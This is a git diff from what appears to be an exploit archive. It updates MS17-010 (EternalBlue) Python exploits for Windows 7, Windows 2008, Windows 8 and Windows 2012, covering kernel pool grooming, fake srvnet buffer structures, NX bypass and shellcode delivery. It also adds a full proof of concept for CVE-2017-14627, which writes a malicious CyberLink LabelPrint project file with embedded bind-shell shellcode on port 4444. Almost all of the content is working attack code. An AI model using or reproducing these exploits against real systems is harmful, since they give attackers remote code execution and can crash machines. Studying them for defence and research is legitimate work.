# Also this is invalid SMB2 message.
|
||||
# I believe NSA exploit use SMB2 for hiding alert from IDS
|
||||
#pkt += '\xffSMB' # smb2
|
||||
#pkt += '\xfeSMB' # smb2
|
||||
# it can be anything even it is invalid
|
||||
pkt += 'BAAD' # can be any
|
||||
if for_nx:
|
||||
|
@ -413,25 +455,29 @@ def createConnectionWithBigSMBFirst80(target, for_nx=False):
|
|||
def exploit(target, shellcode, numGroomConn):
|
||||
# force using smb.SMB for SMB1
|
||||
conn = smb.SMB(target, target)
|
||||
|
||||
# can use conn.login() for ntlmv2
|
||||
conn.login_standard('', '')
|
||||
conn.login(USERNAME, PASSWORD)
|
||||
server_os = conn.get_server_os()
|
||||
print('Target OS: '+server_os)
|
||||
if not (server_os.startswith("Windows 8") or server_os.startswith("Windows Server 2012 ")):
|
||||
if server_os.startswith("Windows 10 "):
|
||||
build = int(server_os.split()[-1])
|
||||
if build >= 14393: # version 1607
|
||||
print('This exploit does not support this target')
|
||||
sys.exit()
|
||||
elif not (server_os.startswith("Windows 8") or server_os.startswith("Windows Server 2012 ")):
|
||||
print('This exploit does not support this target')
|
||||
sys.exit()
|
||||
|
||||
tid = conn.tree_connect_andx('\\\\'+target+'\\'+'IPC$')
|
||||
|
||||
# Send special feaList to a target except last fragment with SMB_COM_NT_TRANSACT and SMB_COM_TRANSACTION2_SECONDARY command
|
||||
progress = send_nt_trans(conn, tid, 0, feaList, '\x00'*30, len(feaList)%4096, False)
|
||||
# The minimum requirement to trigger bug in SrvOs2FeaListSizeToNt() is SrvSmbOpen2() which is TRANS2_OPEN2 subcommand.
|
||||
# Send TRANS2_OPEN2 (0) with special feaList to a target except last fragment
|
||||
progress = send_big_trans2(conn, tid, 0, feaList, '\x00'*30, len(feaList)%4096, False)
|
||||
|
||||
# Another NT transaction for disabling NX
|
||||
# Another TRANS2_OPEN2 (0) with special feaList for disabling NX
|
||||
nxconn = smb.SMB(target, target)
|
||||
nxconn.login_standard('', '')
|
||||
nxconn.login(USERNAME, PASSWORD)
|
||||
nxtid = nxconn.tree_connect_andx('\\\\'+target+'\\'+'IPC$')
|
||||
nxprogress = send_nt_trans(nxconn, nxtid, 0, feaListNx, '\x00'*30, len(feaList)%4096, False)
|
||||
nxprogress = send_big_trans2(nxconn, nxtid, 0, feaListNx, '\x00'*30, len(feaList)%4096, False)
|
||||
|
||||
# create some big buffer at server
|
||||
# this buffer MUST NOT be big enough for overflown buffer
|
||||
|
@ -455,12 +501,12 @@ def exploit(target, shellcode, numGroomConn):
|
|||
for i in range(5):
|
||||
sk = createConnectionWithBigSMBFirst80(target, for_nx=True)
|
||||
srvnetConn.append(sk)
|
||||
|
||||
|
||||
# remove holeConn to create hole for fea buffer
|
||||
holeConn.get_socket().close()
|
||||
|
||||
# send last fragment to create buffer in hole and OOB write one of srvnetConn struct header
|
||||
# first trigger to overwrite srvnet buffer struct for disabling NX
|
||||
# first trigger, overwrite srvnet buffer struct for disabling NX
|
||||
send_trans2_second(nxconn, nxtid, feaListNx[nxprogress:], nxprogress)
|
||||
recvPkt = nxconn.recvSMB()
|
||||
retStatus = recvPkt.getNTStatus()
|
||||
|
@ -475,7 +521,7 @@ def exploit(target, shellcode, numGroomConn):
|
|||
sk.send('\x00')
|
||||
|
||||
# send last fragment to create buffer in hole and OOB write one of srvnetConn struct header
|
||||
# second trigger to place fake struct and shellcode
|
||||
# second trigger, place fake struct and shellcode
|
||||
send_trans2_second(conn, tid, feaList[progress:], progress)
|
||||
recvPkt = conn.recvSMB()
|
||||
retStatus = recvPkt.getNTStatus()
|
||||
|
@ -513,8 +559,8 @@ fp = open(sys.argv[2], 'rb')
|
|||
sc = fp.read()
|
||||
fp.close()
|
||||
|
||||
if len(sc) > 4096:
|
||||
print('Shellcode too long. The place that this exploit put a shellcode is limited to 4096 bytes.')
|
||||
if len(sc) > 0xe80:
|
||||
print('Shellcode too long. The place that this exploit put a shellcode is limited to {} bytes.'.format(0xe80))
|
||||
sys.exit()
|
||||
|
||||
# Now, shellcode is known. create a feaList
|
||||
|
|
|
@ -1,7 +1,6 @@
|
|||
#!/usr/bin/python
|
||||
from impacket import smb
|
||||
from struct import pack
|
||||
import os
|
||||
import sys
|
||||
import socket
|
||||
|
||||
|
@ -11,43 +10,20 @@ The exploit might FAIL and CRASH a target system (depended on what is overwritte
|
|||
|
||||
Tested on:
|
||||
- Windows 7 SP1 x64
|
||||
- Windows 2008 R2 x64
|
||||
- Windows 2008 R2 SP1 x64
|
||||
- Windows 7 SP1 x86
|
||||
- Windows 2008 SP1 x64
|
||||
- Windows 2008 SP1 x86
|
||||
|
||||
Reference:
|
||||
- http://blogs.360.cn/360safe/2017/04/17/nsa-eternalblue-smb/
|
||||
|
||||
|
||||
Bug detail:
|
||||
- For the bug detail, please see http://blogs.360.cn/360safe/2017/04/17/nsa-eternalblue-smb/
|
||||
- You can see SrvOs2FeaListToNt(), SrvOs2FeaListSizeToNt() and SrvOs2FeaToNt() functions logic from WinNT4 source code
|
||||
https://github.com/Safe3/WinNT4/blob/master/private/ntos/srv/ea.c#L263
|
||||
- In vulnerable SrvOs2FeaListSizeToNt() function, there is a important change from WinNT4 in for loop. The psuedo code is here.
|
||||
if (nextFea > lastFeaStartLocation) {
|
||||
// this code is for shrinking FeaList->cbList because last fea is invalid.
|
||||
// FeaList->cbList is DWORD but it is cast to WORD.
|
||||
*(WORD *)FeaList = (BYTE*)fea - (BYTE*)FeaList;
|
||||
return size;
|
||||
}
|
||||
- Here is related struct info.
|
||||
#####
|
||||
typedef struct _FEA { /* fea */
|
||||
BYTE fEA; /* flags */
|
||||
BYTE cbName; /* name length not including NULL */
|
||||
USHORT cbValue; /* value length */
|
||||
} FEA, *PFEA;
|
||||
|
||||
typedef struct _FEALIST { /* feal */
|
||||
DWORD cbList; /* total bytes of structure including full list */
|
||||
FEA list[1]; /* variable length FEA structures */
|
||||
} FEALIST, *PFEALIST;
|
||||
|
||||
typedef struct _FILE_FULL_EA_INFORMATION {
|
||||
ULONG NextEntryOffset;
|
||||
UCHAR Flags;
|
||||
UCHAR EaNameLength;
|
||||
USHORT EaValueLength;
|
||||
CHAR EaName[1];
|
||||
} FILE_FULL_EA_INFORMATION, *PFILE_FULL_EA_INFORMATION;
|
||||
- For the buffer overflow bug detail, please see http://blogs.360.cn/360safe/2017/04/17/nsa-eternalblue-smb/
|
||||
- The exploit also use other 2 bugs (see details in BUG.txt)
|
||||
- Send a large transaction with SMB_COM_NT_TRANSACT but processed as SMB_COM_TRANSACTION2 (requires for trigger bug)
|
||||
- Send special session setup command (SMB login command) to allocate big nonpaged pool (use for creating hole)
|
||||
######
|
||||
|
||||
|
||||
|
@ -68,7 +44,7 @@ srvnet buffer info:
|
|||
- Controlling pointer to fake struct results in code execution because there is pointer to function
|
||||
- A srvnet buffer is created after target receiving first 4 bytes
|
||||
- First 4 bytes contains length of SMB message
|
||||
- The possible srvnet buffer size is "..., 0x8???, 0x11000, 0x21000, ...". srvnet.sys will select the size that big enough.
|
||||
- The possible srvnet buffer size is "..., 0x9000, 0x11000, 0x21000, ...". srvnet.sys will select the size that big enough.
|
||||
- After receiving whole SMB message or connection lost, server call SrvNetWskReceiveComplete() to handle SMB message
|
||||
- SrvNetWskReceiveComplete() check and set some value then pass SMB message to SrvNetCommonReceiveHandler()
|
||||
- SrvNetCommonReceiveHandler() passes SMB message to SMB handler
|
||||
|
@ -76,8 +52,24 @@ srvnet buffer info:
|
|||
- If SrvNetCommonReceiveHandler() call our shellcode, no SMB handler is called
|
||||
- Normally, SMB handler free the srvnet buffer when done but our shellcode dose not. So memory leak happen.
|
||||
- Memory leak is ok to be ignored
|
||||
|
||||
|
||||
Shellcode note:
|
||||
- Shellcode is executed in kernel mode (ring 0) and IRQL is DISPATCH_LEVEL
|
||||
- Hijacking system call is common method for getting code execution in Process context (IRQL is PASSIVE_LEVEL)
|
||||
- On Windows x64, System call target address can be modified by writing to IA32_LSTAR MSR (0xc0000082)
|
||||
- IA32_LSTAR MSR scope is core/thread/unique depended on CPU model
|
||||
- On idle target with multiple core processors, the hijacked system call might take a while (> 5 minutes) to
|
||||
get call because it is called on other processors
|
||||
- Shellcode should be aware of double overwriting system call target address when using hijacking system call method
|
||||
- Then, using APC in Process context to get code execution in userland (ring 3)
|
||||
|
||||
#E-DB Note: https://gist.github.com/worawit/bd04bad3cd231474763b873df081c09a
|
||||
#E-DB Note: https://github.com/worawit/MS17-010/blob/eafb47d715fe38045c9ea6dc4cb75ca0ef5487ce/eternalblue_exploit7.py
|
||||
'''
|
||||
|
||||
# Note: see how to craft FEALIST in eternalblue_poc.py
|
||||
|
||||
# wanted overflown buffer size (this exploit support only 0x10000 and 0x11000)
|
||||
# the size 0x10000 is easier to debug when setting breakpoint in SrvOs2FeaToNt() because it is called only 2 time
|
||||
# the size 0x11000 is used in nsa exploit. this size is more reliable.
|
||||
|
@ -117,7 +109,7 @@ struct SRVNET_BUFFER {
|
|||
// offset from SRVNET_POOLHDR: 0x50
|
||||
DWORD nbssSize; // size of this smb packet (from user)
|
||||
DWORD pad4;
|
||||
QWORD pSrvNetWekStruct; // want to change to fake struct address
|
||||
QWORD pSrvNetWskStruct; // want to change to fake struct address
|
||||
// offset from SRVNET_POOLHDR: 0x60
|
||||
MDL *pMdl2;
|
||||
QWORD unknown5;
|
||||
|
@ -170,7 +162,7 @@ fakeSrvNetBufferNsa = pack('<II', 0x11000, 0)*2
|
|||
fakeSrvNetBufferNsa += pack('<HHI', 0xffff, 0, 0)*2
|
||||
fakeSrvNetBufferNsa += '\x00'*16
|
||||
fakeSrvNetBufferNsa += pack('<IIII', TARGET_HAL_HEAP_ADDR_x86+0x100, 0, 0, TARGET_HAL_HEAP_ADDR_x86+0x20)
|
||||
fakeSrvNetBufferNsa += pack('<IIHHI', TARGET_HAL_HEAP_ADDR_x86+0x100, 0xffffffff, 0x60, 0x1004, 0) # _, x86 MDL.Next, .Size, .MdlFlags, .Process
|
||||
fakeSrvNetBufferNsa += pack('<IIHHI', TARGET_HAL_HEAP_ADDR_x86+0x100, 0, 0x60, 0x1004, 0) # _, x86 MDL.Next, .Size, .MdlFlags, .Process
|
||||
fakeSrvNetBufferNsa += pack('<IIQ', TARGET_HAL_HEAP_ADDR_x86-0x80, 0, TARGET_HAL_HEAP_ADDR_x64) # x86 MDL.MappedSystemVa, _, x64 pointer to fake struct
|
||||
fakeSrvNetBufferNsa += pack('<QQ', TARGET_HAL_HEAP_ADDR_x64+0x100, 0) # x64 pmdl2
|
||||
# below 0x20 bytes is overwritting MDL
|
||||
|
@ -194,7 +186,7 @@ fakeSrvNetBufferX64 += pack('<QQ', 0, TARGET_HAL_HEAP_ADDR_x64-0x80) # MDL.Proc
|
|||
fakeSrvNetBuffer = fakeSrvNetBufferNsa
|
||||
#fakeSrvNetBuffer = fakeSrvNetBufferX64
|
||||
|
||||
feaList = pack('<I', 0x10000) # the max value of feaList size is 0x10000 (the only value that can trigger bug)
|
||||
feaList = pack('<I', 0x10000) # the value of feaList size MUST be >=0x10000 to trigger bug (but must be less than data size)
|
||||
feaList += ntfea[NTFEA_SIZE]
|
||||
# Note:
|
||||
# - SMB1 data buffer header is 16 bytes and 8 bytes on x64 and x86 respectively
|
||||
|
@ -253,24 +245,30 @@ def sendEcho(conn, tid, data):
|
|||
print('got bad ECHO response: 0x{:x}'.format(recvPkt.getNTStatus()))
|
||||
|
||||
|
||||
# do not know why Word Count can be 12
|
||||
# if word count is not 12, setting ByteCount without enough data will be failed
|
||||
class SMBSessionSetupAndXCustom_Parameters(smb.SMBAndXCommand_Parameters):
|
||||
structure = (
|
||||
('MaxBuffer','<H'),
|
||||
('MaxMpxCount','<H'),
|
||||
('VCNumber','<H'),
|
||||
('SessionKey','<L'),
|
||||
#('AnsiPwdLength','<H'),
|
||||
('UnicodePwdLength','<H'),
|
||||
('_reserved','<L=0'),
|
||||
('Capabilities','<L'),
|
||||
)
|
||||
|
||||
def createSessionAllocNonPaged(target, size):
|
||||
# The big nonpaged pool allocation is in BlockingSessionSetupAndX() function
|
||||
# You can see the allocation logic (even code is not the same) in WinNT4 source code
|
||||
# https://github.com/Safe3/WinNT4/blob/master/private/ntos/srv/smbadmin.c#L1050 till line 1071
|
||||
# There is a bug in SMB_COM_SESSION_SETUP_ANDX command that allow us to allocate a big nonpaged pool.
|
||||
# The big nonpaged pool allocation is in BlockingSessionSetupAndX() function for storing NativeOS and NativeLanMan.
|
||||
# The NativeOS and NativeLanMan size is caculated from "ByteCount - other_data_size"
|
||||
|
||||
# Normally a server validate WordCount and ByteCount field in SrvValidateSmb() function. They must not be larger than received data.
|
||||
# For "NT LM 0.12" dialect, There are 2 possible packet format for SMB_COM_SESSION_SETUP_ANDX command.
|
||||
# - https://msdn.microsoft.com/en-us/library/ee441849.aspx for LM and NTLM authentication
|
||||
# - GetNtSecurityParameters() function is resposible for extracting data from this packet format
|
||||
# - https://msdn.microsoft.com/en-us/library/cc246328.aspx for NTLMv2 (NTLM SSP) authentication
|
||||
# - GetExtendSecurityParameters() function is resposible for extracting data from this packet format
|
||||
|
||||
# These 2 formats have different WordCount (first one is 13 and later is 12).
|
||||
# Here is logic in BlockingSessionSetupAndX() related to this bug
|
||||
# - check WordCount for both formats (the CAP_EXTENDED_SECURITY must be set for extended security format)
|
||||
# - if FLAGS2_EXTENDED_SECURITY and CAP_EXTENDED_SECURITY are set, process a message as Extend Security request
|
||||
# - else, process a message as NT Security request
|
||||
|
||||
# So we can send one format but server processes it as another format by controlling FLAGS2_EXTENDED_SECURITY and CAP_EXTENDED_SECURITY.
|
||||
# With this confusion, server read a ByteCount from wrong offset to calculating "NativeOS and NativeLanMan size".
|
||||
# But GetExtendSecurityParameters() checks ByteCount value again.
|
||||
|
||||
# So the only possible request to use the bug is sending Extended Security request but does not set FLAGS2_EXTENDED_SECURITY.
|
||||
|
||||
conn = smb.SMB(target, target)
|
||||
_, flags2 = conn.get_flags()
|
||||
# FLAGS2_EXTENDED_SECURITY MUST not be set
|
||||
|
@ -287,17 +285,16 @@ def createSessionAllocNonPaged(target, size):
|
|||
pkt = smb.NewSMBPacket()
|
||||
|
||||
sessionSetup = smb.SMBCommand(smb.SMB.SMB_COM_SESSION_SETUP_ANDX)
|
||||
sessionSetup['Parameters'] = SMBSessionSetupAndXCustom_Parameters()
|
||||
sessionSetup['Parameters'] = smb.SMBSessionSetupAndX_Extended_Parameters()
|
||||
|
||||
sessionSetup['Parameters']['MaxBuffer'] = 61440 # can be any value greater than response size
|
||||
sessionSetup['Parameters']['MaxMpxCount'] = 2 # can by any value
|
||||
sessionSetup['Parameters']['VCNumber'] = os.getpid()
|
||||
sessionSetup['Parameters']['SessionKey'] = 0
|
||||
sessionSetup['Parameters']['AnsiPwdLength'] = 0
|
||||
sessionSetup['Parameters']['UnicodePwdLength'] = 0
|
||||
sessionSetup['Parameters']['Capabilities'] = 0x80000000
|
||||
sessionSetup['Parameters']['MaxBufferSize'] = 61440 # can be any value greater than response size
|
||||
sessionSetup['Parameters']['MaxMpxCount'] = 2 # can by any value
|
||||
sessionSetup['Parameters']['VcNumber'] = 2 # any non-zero
|
||||
sessionSetup['Parameters']['SessionKey'] = 0
|
||||
sessionSetup['Parameters']['SecurityBlobLength'] = 0 # this is OEMPasswordLen field in another format. 0 for NULL session
|
||||
# UnicodePasswordLen field is in Reserved for extended security format. 0 for NULL session
|
||||
sessionSetup['Parameters']['Capabilities'] = smb.SMB.CAP_EXTENDED_SECURITY # can add other flags
|
||||
|
||||
# set ByteCount here
|
||||
sessionSetup['Data'] = pack('<H', reqSize) + '\x00'*20
|
||||
pkt.addCommand(sessionSetup)
|
||||
|
||||
|
@ -362,12 +359,36 @@ def send_trans2_second(conn, tid, data, displacement):
|
|||
conn.sendSMB(pkt)
|
||||
|
||||
|
||||
def send_nt_trans(conn, tid, setup, data, param, firstDataFragmentSize, sendLastChunk=True):
|
||||
def send_big_trans2(conn, tid, setup, data, param, firstDataFragmentSize, sendLastChunk=True):
|
||||
# Here is another bug in MS17-010.
|
||||
# To call transaction subcommand, normally a client need to use correct SMB commands as documented in
|
||||
# https://msdn.microsoft.com/en-us/library/ee441514.aspx
|
||||
# If a transaction message is larger than SMB message (MaxBufferSize in session parameter), a client
|
||||
# can use *_SECONDARY command to send transaction message. When sending a transaction completely with
|
||||
# *_SECONDARY command, a server uses the last command that complete the transaction.
|
||||
# For example:
|
||||
# - if last command is SMB_COM_NT_TRANSACT_SECONDARY, a server executes subcommand as NT_TRANSACT_*.
|
||||
# - if last command is SMB_COM_TRANSACTION2_SECONDARY, a server executes subcommand as TRANS2_*.
|
||||
#
|
||||
# Without MS17-010 patch, a client can mix a transaction command if TID, PID, UID, MID are the same.
|
||||
# For example:
|
||||
# - a client start transaction with SMB_COM_NT_TRANSACT command
|
||||
# - a client send more transaction data with SMB_COM_NT_TRANSACT_SECONDARY and SMB_COM_TRANSACTION2_SECONDARY
|
||||
# - a client sned last transactino data with SMB_COM_TRANSACTION2_SECONDARY
|
||||
# - a server executes transaction subcommand as TRANS2_* (first 2 bytes of Setup field)
|
||||
|
||||
# From https://msdn.microsoft.com/en-us/library/ee442192.aspx, a maximum data size for sending a transaction
|
||||
# with SMB_COM_TRANSACTION2 is 65535 because TotalDataCount field is USHORT
|
||||
# While a maximum data size for sending a transaction with SMB_COM_NT_TRANSACT is >65536 because TotalDataCount
|
||||
# field is ULONG (see https://msdn.microsoft.com/en-us/library/ee441534.aspx).
|
||||
# Note: a server limit SetupCount+TotalParameterCount+TotalDataCount to 0x10400 (in SrvAllocationTransaction)
|
||||
|
||||
pkt = smb.NewSMBPacket()
|
||||
pkt['Tid'] = tid
|
||||
|
||||
command = pack('<H', setup)
|
||||
|
||||
|
||||
# Use SMB_COM_NT_TRANSACT because we need to send data >65535 bytes to trigger the bug.
|
||||
transCommand = smb.SMBCommand(smb.SMB.SMB_COM_NT_TRANSACT)
|
||||
transCommand['Parameters'] = smb.SMBNTTransaction_Parameters()
|
||||
transCommand['Parameters']['MaxSetupCount'] = 1
|
||||
|
@ -408,8 +429,10 @@ def send_nt_trans(conn, tid, setup, data, param, firstDataFragmentSize, sendLast
|
|||
conn.sendSMB(pkt)
|
||||
conn.recvSMB() # must be success
|
||||
|
||||
# Then, use SMB_COM_TRANSACTION2_SECONDARY for send more data
|
||||
i = firstDataFragmentSize
|
||||
while i < len(data):
|
||||
# limit data to 4096 bytes per SMB message because this size can be used for all Windows version
|
||||
sendSize = min(4096, len(data) - i)
|
||||
if len(data) - i <= 4096:
|
||||
if not sendLastChunk:
|
||||
|
@ -440,7 +463,7 @@ def createConnectionWithBigSMBFirst80(target):
|
|||
# There is no need to be SMB2 because we got code execution by corrupted srvnet buffer.
|
||||
# Also this is invalid SMB2 message.
|
||||
# I believe NSA exploit use SMB2 for hiding alert from IDS
|
||||
#pkt += '\xffSMB' # smb2
|
||||
#pkt += '\xfeSMB' # smb2
|
||||
# it can be anything even it is invalid
|
||||
pkt += 'BAAD' # can be any
|
||||
pkt += '\x00'*0x7c
|
||||
|
@ -456,27 +479,16 @@ def exploit(target, shellcode, numGroomConn):
|
|||
conn.login_standard('', '')
|
||||
server_os = conn.get_server_os()
|
||||
print('Target OS: '+server_os)
|
||||
if not (server_os.startswith("Windows 7 ") or server_os.startswith("Windows Server 2008 ")):
|
||||
if not (server_os.startswith("Windows 7 ") or (server_os.startswith("Windows Server ") and ' 2008 ' in server_os) or server_os.startswith("Windows Vista")):
|
||||
print('This exploit does not support this target')
|
||||
sys.exit()
|
||||
|
||||
|
||||
tid = conn.tree_connect_andx('\\\\'+target+'\\'+'IPC$')
|
||||
|
||||
# Here is code path in WinNT4 (all reference files are relative path to https://github.com/Safe3/WinNT4/blob/master/private/ntos/srv/)
|
||||
# - SrvSmbNtTransaction() (smbtrans.c#L2677)
|
||||
# - When all data is received, call ExecuteTransaction() at (smbtrans.c#L3113)
|
||||
# - ExecuteTransaction() (smbtrans.c#L82)
|
||||
# - Call dispatch table (smbtrans.c#L347)
|
||||
# - Dispatch table is defined at srvdata.c#L972 (target is command 0, SrvSmbOpen2() function)
|
||||
# - SrvSmbOpen2() (smbopen.c#L1002)
|
||||
# - call SrvOs2FeaListToNt() (smbopen.c#L1095)
|
||||
|
||||
# https://msdn.microsoft.com/en-us/library/ee441720.aspx
|
||||
# Send special feaList to a target except last fragment with SMB_COM_NT_TRANSACT and SMB_COM_TRANSACTION2_SECONDARY command
|
||||
# Note: cannot use SMB_COM_TRANSACTION2 for the exploit because the TotalDataCount field is USHORT
|
||||
# Note: transaction max data count is 66512 (0x103d0) and DataDisplacement is USHORT
|
||||
progress = send_nt_trans(conn, tid, 0, feaList, '\x00'*30, 2000, False)
|
||||
# The minimum requirement to trigger bug in SrvOs2FeaListSizeToNt() is SrvSmbOpen2() which is TRANS2_OPEN2 subcommand.
|
||||
# Send TRANS2_OPEN2 (0) with special feaList to a target except last fragment
|
||||
progress = send_big_trans2(conn, tid, 0, feaList, '\x00'*30, 2000, False)
|
||||
# we have to know what size of NtFeaList will be created when last fragment is sent
|
||||
|
||||
# make sure server recv all payload before starting allocate big NonPaged
|
||||
|
|
154
platforms/windows/local/42777.py
Executable file
154
platforms/windows/local/42777.py
Executable file
|
@ -0,0 +1,154 @@
|
|||
#!/usr/bin/python
|
||||
# Exploit Title: CyberLink LabelPrint <=2.5 File Project Processing Unicode Stack Overflow
|
||||
# Date: September 23, 2017
|
||||
# Exploit Author: f3ci
|
||||
# Vendor Homepage: https://www.cyberlink.com/
|
||||
# Software Link: http://update.cyberlink.com/Retail/Power2Go/DL/TR170323-021/CyberLink_Power2Go_Downloader.exe
|
||||
# Version: 2.5
|
||||
# Tested on: Windows 7x86, Windows8.1x64, Windows 10
|
||||
# CVE : CVE-2017-14627
|
||||
#
|
||||
# Note: Cyberlink LabelPrint is bundled with Power2Go application and also included in most HP, Lenovo, and Asus laptops.
|
||||
# this proof of concept is based on the LabelPrint 2.5 that comes with Power2Go installation.
|
||||
|
||||
def exp():
|
||||
header = ("\x3c\x50\x52\x4f\x4a\x45\x43\x54\x20\x76\x65\x72\x73\x69\x6f\x6e"
|
||||
"\x3d\x22\x31\x2e\x30\x2e\x30\x30\x22\x3e\x0a\x09\x3c\x49\x4e\x46"
|
||||
"\x4f\x52\x4d\x41\x54\x49\x4f\x4e\x20\x74\x69\x74\x6c\x65\x3d\x22"
|
||||
"\x22\x20\x61\x75\x74\x68\x6f\x72\x3d\x22\x22\x20\x64\x61\x74\x65"
|
||||
"\x3d\x22\x37\x2f\x32\x34\x2f\x32\x30\x31\x37\x22\x20\x53\x79\x73"
|
||||
"\x74\x65\x6d\x54\x69\x6d\x65\x3d\x22\x32\x34\x2f\x30\x37\x2f\x32"
|
||||
"\x30\x31\x37\x22\x3e")
|
||||
filename2 = "labelprint_poc_universal.lpp"
|
||||
f = open(filename2,'w')
|
||||
junk = "A" * 790
|
||||
nseh = "\x61\x42"
|
||||
seh = "\x2c\x44"
|
||||
nop = "\x42"
|
||||
|
||||
#msfvenom -p windows/shell_bind_tcp LPORT=4444 -e x86/unicode_mixed BufferRegister=EAX -f python
|
||||
buf = ""
|
||||
buf += "PPYAIAIAIAIAIAIAIAIAIAIAIAIAIAIAjXAQADAZABARALAYAIAQ"
|
||||
buf += "AIAQAIAhAAAZ1AIAIAJ11AIAIABABABQI1AIQIAIQI111AIAJQYA"
|
||||
buf += "ZBABABABABkMAGB9u4JBkL7x52KPYpM0aPqyHeMa5pbDtKNpNPBk"
|
||||
buf += "QBjlTKaBkd4KD2mXzo87pJlfNQ9ovLOLs1cLIrnLMPGQfoZmyqI7"
|
||||
buf += "GrZRobnwRk1Bn0bknjOLDKPLkaQhGsNhzawaOa4KaIO0M1XSbka9"
|
||||
buf += "lXISmja9Rkp4TKM1FvMaYofLfaXOjmYqUw08wp0uJVJcqmYhmk3M"
|
||||
buf += "o4rUk41HTK28NDjaFsrFRklLPK4KaHklzaICTKytbkM1VpSYa4nD"
|
||||
buf += "NDOkaKaQ291JoaIoWpqOaOQJtKN2HkTMOmOxOCOBIpm0C8CGT3oB"
|
||||
buf += "OopTC80L2WNFzgyoz5Txf0ZaYpm0kyfdB4np38kycPpkypIoiEPj"
|
||||
buf += "kXqInp8bKMmpr010pPC8YZjoiOK0yohU67PhLBypjq1L3YzF1ZLP"
|
||||
buf += "aFaGPh7R9KoGBGKO8U271XEg8iOHIoiohUaGrH3DJLOK7qIo9EPW"
|
||||
buf += "eG1XBU0nnmc1YoYEC81SrMs4ip4IyS27ogaGnQjVaZn2B9b6jBkM"
|
||||
buf += "S6I7oTMTMliqkQ2m14nDN0UvKPndb4r0of1FNv0Fr6nn0VR6B31F"
|
||||
buf += "BH49FlmoTFyoIEbi9P0NPVq6YolpaXjhsWmMc0YoVuGKHpEe3rnv"
|
||||
buf += "QXVFce5mcmkOiEMlKV1lLJ3Pyk9PT5m5GKoWZsSBRO2JypPSYoxUAA"
|
||||
|
||||
|
||||
#preparing address for decoding
|
||||
ven = nop #nop/inc edx
|
||||
ven += "\x54" #push esp
|
||||
ven += nop #nop/inc edx
|
||||
ven += "\x58" #pop eax
|
||||
ven += nop #nop/inc edx
|
||||
ven += "\x05\x1B\x01" #add eax 01001B00 universal
|
||||
ven += nop #nop/inc edx
|
||||
ven += "\x2d\x01\x01" #sub eax 01001000
|
||||
ven += nop #nop/inc edx
|
||||
ven += "\x50" #push eax
|
||||
ven += nop #nop/inc edx
|
||||
ven += "\x5c" #pop esp
|
||||
|
||||
#we need to encode the RET address, since C3 is bad char.
|
||||
#preparing ret opcode
|
||||
ven += nop #nop/inc edx
|
||||
ven += "\x25\x7e\x7e" #and eax,7e007e00
|
||||
ven += nop #nop/inc edx
|
||||
ven += "\x25\x01\x01" #and eax,01000100
|
||||
ven += nop #nop/inc edx
|
||||
ven += "\x35\x7f\x7f" #xor eax,7f007f00
|
||||
ven += nop #nop/inc edx
|
||||
ven += "\x05\x44\x44" #add eax,44004400
|
||||
ven += nop #nop/inc edx
|
||||
ven += "\x57" #push edi
|
||||
ven += nop #nop/inc edx
|
||||
ven += "\x50" #push eax
|
||||
ven += junk2 #depending OS
|
||||
|
||||
#custom venetian
|
||||
ven += "\x58" #pop eax
|
||||
ven += nop #nop/inc edx
|
||||
ven += "\x58" #pop eax
|
||||
ven += nop #nop/inc edx
|
||||
ven += align #depending OS
|
||||
ven += nop #nop/inc edx
|
||||
ven += "\x2d\x01\x01" #add eax, 01000100 #align eax to our buffer
|
||||
ven += nop #nop/inc edx
|
||||
ven += "\x50" #push eax
|
||||
ven += nop #nop/inc edx
|
||||
|
||||
#call esp 0x7c32537b MFC71U.dll
|
||||
ven += "\x5C" #pop esp
|
||||
ven += nop #nop/inc edx
|
||||
ven += "\x58" #pop eax
|
||||
ven += nop #nop/inc edx
|
||||
ven += "\x05\x53\x7c" #add eax 7c005300 part of call esp
|
||||
ven += nop #nop/inc edx
|
||||
ven += "\x50" #push eax
|
||||
ven += junk1 #depending OS
|
||||
ven += "\x7b\x32" #part of call esp
|
||||
|
||||
#preparing for shellcode
|
||||
ven += nop * 114 #junk
|
||||
ven += "\x57" #push edi
|
||||
ven += nop #nop/inc edx
|
||||
ven += "\x58" #pop eax
|
||||
ven += nop #nop/inc edx
|
||||
ven += align2 #depending OS
|
||||
ven += nop #nop/inc edx
|
||||
ven += "\x2d\x01\x01" #sub eax,01000100
|
||||
ven += nop #nop/inc edx
|
||||
ven += buf #shellcode
|
||||
|
||||
sisa = nop * (15000-len(junk+nseh+seh+ven))
|
||||
payload = junk+nseh+seh+ven+sisa
|
||||
bug="\x09\x09\x3c\x54\x52\x41\x43\x4b\x20\x6e\x61\x6d\x65\x3d"+'"'+payload+'"'+"/>\n"
|
||||
bug+=("\x09\x3c\x2f\x49\x4e\x46\x4f\x52\x4d\x41\x54\x49\x4f\x4e\x3e\x0a"
|
||||
"\x3c\x2f\x50\x52\x4f\x4a\x45\x43\x54\x3e")
|
||||
f.write(header+ "\n" + bug)
|
||||
|
||||
print "[+] File", filename2, "successfully created!"
|
||||
print "[*] Now open project file", filename2, "with CyberLink LabelPrint."
|
||||
print "[*] Good luck ;)"
|
||||
f.close()
|
||||
|
||||
print "[*] <--CyberLink LabelPrint <=2.5 Stack Overflow POC-->"
|
||||
print "[*] by f3ci & modpr0be <research[at]spentera.id>"
|
||||
print "[*] <------------------------------------------------->\n"
|
||||
print "\t1.Windows 7 x86 bindshell on port 4444"
|
||||
print "\t2.Windows 8.1 x64 bindshell on port 4444"
|
||||
print "\t3.Windows 10 x64 bindshell on port 4444\n"
|
||||
input = input("Choose Target OS : ")
|
||||
try:
|
||||
if input == 1:
|
||||
align = "\x05\x09\x01" #add eax,01000400
|
||||
align2 = "\x05\x0A\x01" #add eax, 01000900
|
||||
junk1 = '\x42' * 68 #junk for win7x86
|
||||
junk2 = '\x42' * 893 #junk for win7x86
|
||||
exp()
|
||||
elif input == 2:
|
||||
align = "\x05\x09\x01" #add eax,01000400
|
||||
align2 = "\x05\x0A\x01" #add eax, 01000900
|
||||
junk1 = '\x42' * 116 #junk for win8.1x64
|
||||
junk2 = '\x42' * 845 #junk for win8.1x64
|
||||
exp()
|
||||
elif input == 3:
|
||||
align = "\x05\x05\x01" #add eax,01000400
|
||||
align2 = "\x05\x06\x01" #add eax, 01000900
|
||||
junk1 = '\x42' * 136 #junk for win10x64
|
||||
junk2 = '\x42' * 313 #junk for win10x64
|
||||
exp()
|
||||
else:
|
||||
print "Choose the right one :)"
|
||||
except:
|
||||
print ""
|
|
@ -7,7 +7,7 @@ import socket
|
|||
import time
|
||||
|
||||
'''
|
||||
MS17-010 exploit for Windows 7+ by sleepya
|
||||
